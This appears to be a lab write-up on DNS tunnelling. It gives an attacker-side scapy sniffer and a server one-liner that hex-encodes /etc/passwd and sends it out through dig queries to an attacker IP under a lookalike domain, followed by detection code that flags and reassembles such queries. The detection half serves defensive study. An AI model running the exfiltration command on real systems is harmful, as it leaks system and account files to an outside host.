Environment setup:
Attacker machine (Kali): 192.168.159.129
Server (CentOS): 192.168.159.10
Run the following script on the attacker machine:
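try:
    from scapy.all import sniff, DNS, DNSQR
except ImportError:
    raise SystemExit("Scapy not found, please install scapy: pip install scapy")

def process_packet(pkt):
    # Only look at DNS packets that carry a question section
    if pkt.haslayer(DNS) and pkt.haslayer(DNSQR):
        domain = pkt[DNS][DNSQR].qname.decode('utf-8')
        labels = domain.split('.')
        # Expected form: <hex>.gooogle.com. (the second label is the marker domain)
        if len(labels) > 1 and labels[1].startswith('gooogle'):
            # Strip the 13-character suffix ".gooogle.com." and hex-decode the rest
            print(f'{bytearray.fromhex(domain[:-13]).decode("utf-8")}',
                  flush=True, end='')

sniff(iface="eth0", prn=process_packet)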
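Run the following command on the server (output only appears on the attacker machine once this command has been run on the server, as in the figure above):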
xxd -p -c 31 /etc/passwd | while read line; do dig @192.168.159.129 +short +tries=1 +time=1 $line.gooogle.com; done
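
Seen from the defender's side, the command above leaves a distinctive pattern in DNS query logs: `xxd -p -c 31` produces 62 hex characters per line, just under the 63-byte DNS label limit, so each query carries a long all-hex leftmost label under one parent domain. The following is an added example, not part of the original post, that flags this pattern in (client, qname) pairs and reassembles what left the host; the sample log, the regex bounds and the `MIN_HITS` threshold are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# 8 to 31 hex byte pairs (16-62 characters); a DNS label holds at most 63 bytes
HEX_LABEL = re.compile(r"^(?:[0-9a-f]{2}){8,31}$")
MIN_HITS = 3  # assumed threshold: hex-labelled queries per (client, parent) before alerting

def split_hex_label(qname):
    """Return (payload_bytes, parent_domain) if the leftmost label is pure hex, else None."""
    label, _, parent = qname.rstrip(".").lower().partition(".")
    if not parent or not HEX_LABEL.match(label):
        return None
    return bytes.fromhex(label), parent

def find_hex_tunnels(queries, min_hits=MIN_HITS):
    """queries: iterable of (client_ip, qname) in log order.
    Returns {(client, parent_domain): recovered_bytes} for pairs at or above min_hits."""
    chunks = defaultdict(list)
    for client, qname in queries:
        hit = split_hex_label(qname)
        if hit:
            payload, parent = hit
            chunks[(client, parent)].append(payload)
    return {key: b"".join(parts) for key, parts in chunks.items() if len(parts) >= min_hits}

def sample_queries():
    """Constructed sample log: hex-encoded queries from the lab server mixed with benign lookups."""
    secret = (b"root:x:0:0:root:/root:/bin/bash\n"
              b"bin:x:1:1:bin:/bin:/sbin/nologin\n"
              b"daemon:x:2:2:daemon:/sbin:/sbin/nologin\n")
    exfil = [("192.168.159.10", secret[i:i + 31].hex() + ".gooogle.com.")
             for i in range(0, len(secret), 31)]
    benign = [("192.168.159.10", "www.example.com."),
              ("192.168.159.20", "deadbeefcafe0123.cdn.example.net."),  # lone hex-looking label
              ("192.168.159.20", "mail.example.org.")]
    return benign[:1] + exfil + benign[1:], secret

if __name__ == "__main__":
    log, _ = sample_queries()
    for (client, parent), data in find_hex_tunnels(log).items():
        print(f"ALERT {client} -> *.{parent}: {len(data)} bytes recovered")
        print(data.decode("utf-8", errors="replace"))
```

A final chunk shorter than 8 bytes falls below the regex lower bound and is not reassembled; lowering the bound recovers it at the cost of more false positives on short hex-looking labels.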